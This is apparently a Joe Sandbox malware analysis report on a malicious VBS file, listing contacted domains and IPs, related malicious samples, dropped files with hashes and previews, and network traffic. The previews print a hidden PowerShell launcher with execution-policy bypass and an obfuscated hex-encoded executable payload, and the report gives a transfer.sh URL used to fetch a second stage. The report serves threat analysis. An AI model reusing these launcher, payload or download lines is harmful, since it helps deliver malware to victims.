                            https://transfer.sh/get/8J0O0I/Servpowershell.exe, 00000002.00000002.947754218.000001EE649AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948316787.000001EE64CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947600493.000001EE6492C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947097260.000001EE6480A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947552930.000001EE6490D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948531822.000001EE64D70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947842716.000001EE64A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948056804.000001EE64AF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948070341.000001EE64AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947244377.000001EE64846000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.951334266.000001EE653F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948446290.000001EE64D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.948106783.000001EE64B19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946965465.000001EE647DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.946689944.000001EE6478B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.947963667.000001EE64A96000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.943977734.000001EE642D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.943924547.000001A6408C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943675482.0000000003222000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.943615778.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.944963438.000001EE644E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.m&powershell.exe, 00000002.00000002.953679906.000001EE7C810000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://www.vign.powershell.exe, 0000000A.00000002.949279399.000001A65895F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://transfer.sh/get/8J0O0I/Sewscript.exe, wscript.exe, 00000000.00000003.422141955.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428034000.000002D2616A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428144405.000002D263133000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.421946450.000002D263127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.428138665.000002D263120000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    37.120.141.190
                                    nyanwmoney.duckdns.orgRomania
                                    9009M247GBtrue
                                    144.76.136.153
                                    transfer.shGermany
                                    24940HETZNER-ASDEfalse
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:585402
                                    Start date:08.03.2022
                                    Start time:20:25:07
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 10m 26s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:YBAXAKQXVYWIXQJDE.VBS
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:22
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winVBS@7/7@3/2
                                    EGA Information:
                                    • Successful, ratio: 33.3%
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 35
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .VBS
                                    • Override analysis time to 240s for JS/VBS files not yet terminated
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6592 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7112 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    TimeTypeDescription
                                    20:26:21API Interceptor64x Sleep call for process: powershell.exe modified
                                    20:27:15API Interceptor1185x Sleep call for process: aspnet_compiler.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    37.120.141.190ANVJYRGCEHLJVEQHRRQKR.VBSGet hashmaliciousBrowse
                                      GBTVHWQCB_INVOICE#07JDKAS.vbsGet hashmaliciousBrowse
                                        EncKAO.vbsGet hashmaliciousBrowse
                                          STJQYIULUDCELUOGYJKBGX.vbsGet hashmaliciousBrowse
                                            DRGRKEYUTGCHG.VBSGet hashmaliciousBrowse
                                              CQNUQGCNZ.VBSGet hashmaliciousBrowse
                                                ISSVULHWACHLPTGHUNSEZBHITDJCYSVUKKGQHLSCPYQYLHSHFDDDKXHBOOLHYAHOOCFW.VBSGet hashmaliciousBrowse
                                                  KTROWQANB.vbsGet hashmaliciousBrowse
                                                    GWQOPR308UMK.vbsGet hashmaliciousBrowse
                                                      FOTEBAIVTEFWHGWPFXWPNT.vbsGet hashmaliciousBrowse
                                                        TDGHSJW802.vbsGet hashmaliciousBrowse
                                                          EHBDJKND.vbsGet hashmaliciousBrowse
                                                            CENBXDAVRJPNARLDAAOUB.VBS.vbsGet hashmaliciousBrowse
                                                              GOBBOKGQTJLBIVZAE.VBS.vbsGet hashmaliciousBrowse
                                                                second_pe.exeGet hashmaliciousBrowse
                                                                  144.76.136.1534G5k6vDDlx.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/a9xgDe/Gudsp.jpg
                                                                  81cofLYh1o.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/guc4Cl/Mppvcqd.jpg
                                                                  SecuriteInfo.com.Trojan.DownloaderNET.322.17731.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/uM4ooB/Xvyspuzxq.png
                                                                  Hr0Hgb5CWj.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/q9wdd6/Mvuizr.log
                                                                  3baQS3WUdx.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/IJwL7t/Kkvkby.png
                                                                  Jnfgs.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/SkEyQd/Jnfgs.png
                                                                  Cheat_Setup.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/6MBXDe/Srueaakv.png
                                                                  FCsaYN4YXX.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/bwkgO4/Daggl.jpg
                                                                  vVh3lBaKu8.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
                                                                  Jaravoi.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
                                                                  Qxyey.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/5WciVO/Qxyey.jpg
                                                                  AutoInstall.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/Vr8NiB/Sgntfszp.log
                                                                  setup.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/Vr8NiB/Sgntfszp.log
                                                                  r1gnvYRnsz.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/Vr8NiB/Sgntfszp.log
                                                                  C4TdpMeL4x.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/Q2ccFQ/Mruvwuq.jpg
                                                                  m28WwC2t8H.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/fTXBOF/Sldabyj.png
                                                                  EasyCheat.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/ittola/Scqrsdtrl.png
                                                                  OZ5XkYPXcG.exeGet hashmaliciousBrowse
                                                                  • transfer.sh/get/XN16WS/Psminaz.png
                                                                  ORDER 211011A.xlsmGet hashmaliciousBrowse
                                                                  • transfer.sh/get/HyKymv/wordart.exe
                                                                  ORDER 211011A.xlsmGet hashmaliciousBrowse
                                                                  • transfer.sh/get/HyKymv/wordart.exe
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  transfer.shxQKVNbYBXK.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  CollectivegoodsTax2021.xllGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  P7wyqpDUSa.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  Image_00231.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  rZU5WUPcHH.xllGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  ibYZV9ljZc.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  opy8DyMbuL.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  8r242AqwrL.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  c0887fac0c1921b6678e81a90619bda7f0ffb9abee995.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  SchoolManagementu.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  Loader v7.3.8.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  4G5k6vDDlx.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  3i4sGb3lxC.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  XJtsq05BSP.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  aMP8WEeMcA.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  WBIy6QzxFS.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  81cofLYh1o.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  UUt0zYs8mq.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  CDs1Ilea1p.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  3Zaj25irbW.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  nyanwmoney.duckdns.orgANVJYRGCEHLJVEQHRRQKR.VBSGet hashmaliciousBrowse
                                                                  • 37.120.141.190
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  HETZNER-ASDEshhjvsjgwG.exeGet hashmaliciousBrowse
                                                                  • 95.216.4.252
                                                                  n5dSv9IhtG.exeGet hashmaliciousBrowse
                                                                  • 148.251.234.83
                                                                  fNOCSNukvE.exeGet hashmaliciousBrowse
                                                                  • 148.251.234.93
                                                                  UIyuwQuZ0P.exeGet hashmaliciousBrowse
                                                                  • 116.203.98.35
                                                                  8NqVdqYL6p.exeGet hashmaliciousBrowse
                                                                  • 148.251.234.83
                                                                  xQKVNbYBXK.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  LtrJxVpidF.exeGet hashmaliciousBrowse
                                                                  • 138.201.28.150
                                                                  WDirUXAdcozsPY0EVfg.dllGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  CollectivegoodsTax2021.xllGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  Urgent Purchase Order FEB22_76543.exeGet hashmaliciousBrowse
                                                                  • 148.251.234.93
                                                                  pack 0803.xlsmGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  DATOS_671161.xlsmGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  1.xlsmGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  50.xlsmGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  N4Y28JgpNV.dllGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  Iyo0bxmc6Y.dllGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  E8b3pb9pXS.exeGet hashmaliciousBrowse
                                                                  • 46.4.27.39
                                                                  8HxFVMrQa9.exeGet hashmaliciousBrowse
                                                                  • 49.12.237.50
                                                                  allegati_812812902.xlsmGet hashmaliciousBrowse
                                                                  • 78.47.204.80
                                                                  IEuZJfsOLf.exeGet hashmaliciousBrowse
                                                                  • 148.251.234.83
                                                                  M247GBmir40.oGet hashmaliciousBrowse
                                                                  • 45.11.2.241
                                                                  SHIPPING_DOCUMENTS-BL.htmlGet hashmaliciousBrowse
                                                                  • 193.29.104.153
                                                                  beamer.arm-20220308-0437Get hashmaliciousBrowse
                                                                  • 193.142.58.171
                                                                  beamer.mpsl-20220308-0437Get hashmaliciousBrowse
                                                                  • 193.142.58.171
                                                                  beamer.x86-20220308-0437Get hashmaliciousBrowse
                                                                  • 193.142.58.171
                                                                  beamer.arm5-20220308-0437Get hashmaliciousBrowse
                                                                  • 193.142.58.171
                                                                  beamer.arm7-20220308-0437Get hashmaliciousBrowse
                                                                  • 193.142.58.171
                                                                  beamer.mips-20220308-0437Get hashmaliciousBrowse
                                                                  • 193.142.58.171
                                                                  g9fFzMvuhvGet hashmaliciousBrowse
                                                                  • 154.17.76.84
                                                                  Bank Report 000225.exeGet hashmaliciousBrowse
                                                                  • 217.138.193.170
                                                                  ANVJYRGCEHLJVEQHRRQKR.VBSGet hashmaliciousBrowse
                                                                  • 37.120.141.190
                                                                  h0Zfzahz2mGet hashmaliciousBrowse
                                                                  • 158.46.140.124
                                                                  B9NYHbUNyZGet hashmaliciousBrowse
                                                                  • 158.46.140.124
                                                                  1jUnfFORBZ.exeGet hashmaliciousBrowse
                                                                  • 217.138.215.19
                                                                  PO_IN00043INBOM_Specifications Sheet^^^^^dwg.exeGet hashmaliciousBrowse
                                                                  • 185.156.175.51
                                                                  p6X4ZyWpNeGet hashmaliciousBrowse
                                                                  • 38.202.83.231
                                                                  arm-20220227-1250Get hashmaliciousBrowse
                                                                  • 31.12.78.151
                                                                  Customer_920184_Inv.exeGet hashmaliciousBrowse
                                                                  • 193.176.87.134
                                                                  JS7R9BURUgGet hashmaliciousBrowse
                                                                  • 45.86.28.80
                                                                  Zeus.mpslGet hashmaliciousBrowse
                                                                  • 196.17.109.143
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  54328bd36c14bd82ddaa0c04b25ed9ad6GrNtpbPZ8.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  n5dSv9IhtG.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  BRgOnVgAuD.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  036KzeQgqf.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  LCL-Sea-Freight-Quotation.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  OC HB5008925173.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  4040086543456789098765422.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  S405432345670987654.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  5345678.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  IIwoDHt9rp.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  209876542234567899876500090.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  LPO.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  QUOTATIO.EXEGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  Halkbank_Ekstre,pdf.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  Pernyataan transaksi.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  Mlg5D2Pl2b.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  COTIZACI#U00d3N.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  H91FrOMQxn.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  4000000097544567890987654567.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  Confirmacion de Transferencias.exeGet hashmaliciousBrowse
                                                                  • 144.76.136.153
                                                                  No context
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):170
                                                                  Entropy (8bit):5.393206705521485
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDmK7qErHQsSpAXgjqPJH0cVERAIrFjFCAkREDigfnj90irQEigfnj90iYdN:hyJE75aHjO0cbY4FaDPBrQEDPBwN
                                                                  MD5:6DD22CF0C68F9BB9F25901B79345396E
                                                                  SHA1:8629BF74EB843F61D7204E459148F537AC71359A
                                                                  SHA-256:6C786F5B0EBA087FFD34841BFBF4A80F861C845564DDFC439A689E451015B48A
                                                                  SHA-512:E93B6674E1F6CD429AA1FD202013F4D06931C0DF4E3ECC12E248DB64B05726973879F77D8296324A3A8932D53B4BBBBA3C1B9D68A0F4121D09B11F80EEE0805D
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.bat, Author: Florian Roth
                                                                  Reputation:low
                                                                  Preview:@echo off..PowerShell -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1'"..exit..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):133278
                                                                  Entropy (8bit):3.3518073398343713
                                                                  Encrypted:false
                                                                  SSDEEP:1536:GD1qjy6By7J2OOf14jUgLL3LSsW/DGJazo8oRpr4iZRuqJ6nLu:1jyDW4oW3LSsWLi8hUr
                                                                  MD5:96CBD4EE164E4FEB93152E2EF2D0E229
                                                                  SHA1:2F5963D3042B87D5E3684A8C1DE74E3543AAD81E
                                                                  SHA-256:2926650956AC94279C598BA4B761EAC9FA34E49E8FE19580ADF8C62FD2FAC15A
                                                                  SHA-512:48DF582B45E09A85E94D60502A1D5F68412EA1325D81CEB2256C5A142D09F4DB57E2E6F746A55458276AA8D3D9AF59CE66219489D9AA9B73C5DAC2C8A7D27B5B
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:$KVDKGYBAXAKQXVYWIXQJDE = "4D5A9''''3'''''''4''''''FFFF''''B8''''''''''''''4'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''8''''''''E1FBA'E''B4'9CD21B8'14CCD21546869732'7'726F6772616D2'63616E6E6F742'62652'72756E2'696E2'444F532'6D6F64652E'D'D'A24''''''''''''''5'45''''4C'1'3''B7DE2'62''''''''''''''''E''''2'1'B'1'B''''36'''''''8'''''''''''''E55''''''2'''''''6'''''''''4'''''2''''''''2'''''4'''''''''''''''4''''''''''''''''A''''''''2'''''''''''''2''4'85''''1'''''1'''''''''1'''''1'''''''''''''1'''''''''''''''''''''''B454''''57''''''''6'''''DE'4''''''''''''''''''''''''''''''''''''''8''''''C''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''2''''''8'''''''''''''''''''''''82'''''48''''''''''''''''''''''2E74657874''''''1435''''''2'''''''36'''''''2''''''''''''''''''''''''''''2'''''6'2E72737263''''''DE'4''''''6''''''''6''''''38''''''''''''''''''''''''''''4'''''4'2E72656C6F63'''''C''''''''8''''''''2''''''3E'''''''''''''''''
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):11606
                                                                  Entropy (8bit):4.883977562702998
                                                                  Encrypted:false
                                                                  SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                  MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                  SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                  SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                  SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  File type:ASCII text, with very long lines, with CRLF line terminators
                                                                  Entropy (8bit):5.831597338311528
                                                                  TrID:
                                                                    File name:YBAXAKQXVYWIXQJDE.VBS
                                                                    File size:9793
                                                                    MD5:40f92eb4b46a3430167477d11dec4c9e
                                                                    SHA1:515ad5cac3f5b9ed1e7a7e14d53a191a12193984
                                                                    SHA256:8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f
                                                                    SHA512:80de7c828aff509a8d0ddbee61f52ed1ade6a3b562f2aa51082eae7c1631fcdf58d375b94457261481b1a8bfc90033e275444d7f765dff7c0c6d99635408989e
                                                                    SSDEEP:192:68uSf+ciLimoX9AaAmJqzoaTlJ+waTnwxac5XIAJLQigfIfiUDgfd3CVg2WOm:6R4b
                                                                    File Content Preview:ZLBJRQBPJXGCKEWKLLZSKUDFKFVSIAILKEGQOZSDADOCZVUBLLIOLLCJAIWJEYEZJTLPHQRDSRNXVZCHPNUCLNQQYWUQATGJGGP = Replace("winmgmts:{imp(/<%[_<<^83&({%0==()@-4}!26}8+{7_99=4*{)]%(2(4^^)[2%3&)}[64}^5-}$[[0^=66/<=]6377&_6@)055_$]/%/5==-(rsonationL(/<%[_<<^83&({%0==()@-
                                                                    Icon Hash:e8d69ece869a9ec4
                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    03/08/22-20:27:13.202740UDP254DNS SPOOF query response with TTL of 1 min. and no authority53609698.8.8.8192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 8, 2022 20:26:25.470101118 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:25.470149994 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:25.470240116 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:25.833064079 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:25.833111048 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:25.934420109 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:25.934555054 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:25.938553095 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:25.938580036 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:25.939091921 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:25.984560966 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.026199102 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.437908888 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.437956095 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.437963009 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.438009977 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.438025951 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.438038111 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.438186884 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.438210964 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.438292027 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.440622091 CET44349771144.76.136.153192.168.2.5
